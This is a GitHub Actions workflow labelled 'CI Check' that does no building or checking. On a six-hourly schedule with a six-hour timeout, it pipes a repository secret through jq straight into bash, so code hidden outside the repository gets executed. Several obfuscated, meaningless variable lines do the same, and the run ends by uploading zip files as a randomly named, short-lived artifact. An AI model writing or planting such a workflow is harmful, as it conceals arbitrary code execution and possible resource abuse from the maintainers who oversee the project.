name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '25 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          m9: ${{ secrets.m9 }}
        run: |
          printf '%s' "$m9" | jq -r .jn5 | /bin/bash
          echo $xlae76383 | jq -r .bgaz923 | /bin/bash
          printf '%s' "$qsq602" | jq -r .tkzsp10 | /bin/bash
          echo $kf57473 | jq -r .pfcdi6 | /bin/bash
          echo $ie4834 | jq -r .kw3 | /bin/bash
          echo $rgq97 | jq -r .oqfc1449 | /bin/bash
          echo $j88 | jq -r .x8 | /bin/bash
          printf '%s' "$ue230" | jq -r .w6545 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ipMYOt6y
          path: "*.zip"
          retention-days: 1
